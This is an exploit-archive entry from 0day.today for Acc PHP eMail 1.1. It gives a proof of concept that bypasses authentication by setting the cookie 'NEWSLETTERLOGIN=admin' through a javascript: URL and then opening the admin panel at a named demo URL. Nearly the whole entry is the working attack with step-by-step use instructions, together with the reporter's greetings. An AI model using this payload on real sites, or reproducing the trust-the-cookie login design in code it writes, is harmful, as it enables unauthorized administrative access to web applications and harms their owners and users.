Acc PHP eMail 1.1 Insecure Cookie Handling Vulnerability

2008-11-03T00:00:00
ID 1337DAY-ID-4044
Type zdt
Reporter Hakxer
Modified 2008-11-03T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
Acc PHP eMail 1.1 Insecure Cookie Handling Vulnerability
========================================================


# [~] Discovered by : Hakxer
# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/mailinglist/
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################

   
   PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin";
         javascript:document.cookie="NEWSLETTERLOGIN=Hakxer";
   
   [~] Admin panel 
   http://www.accscripts.com/mailinglist/demo/index.php
   [~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin";
   [~] Refresh
		

#  Proud To be a Muslim #
#_=END=_#



#  0day.today [2018-01-03]  #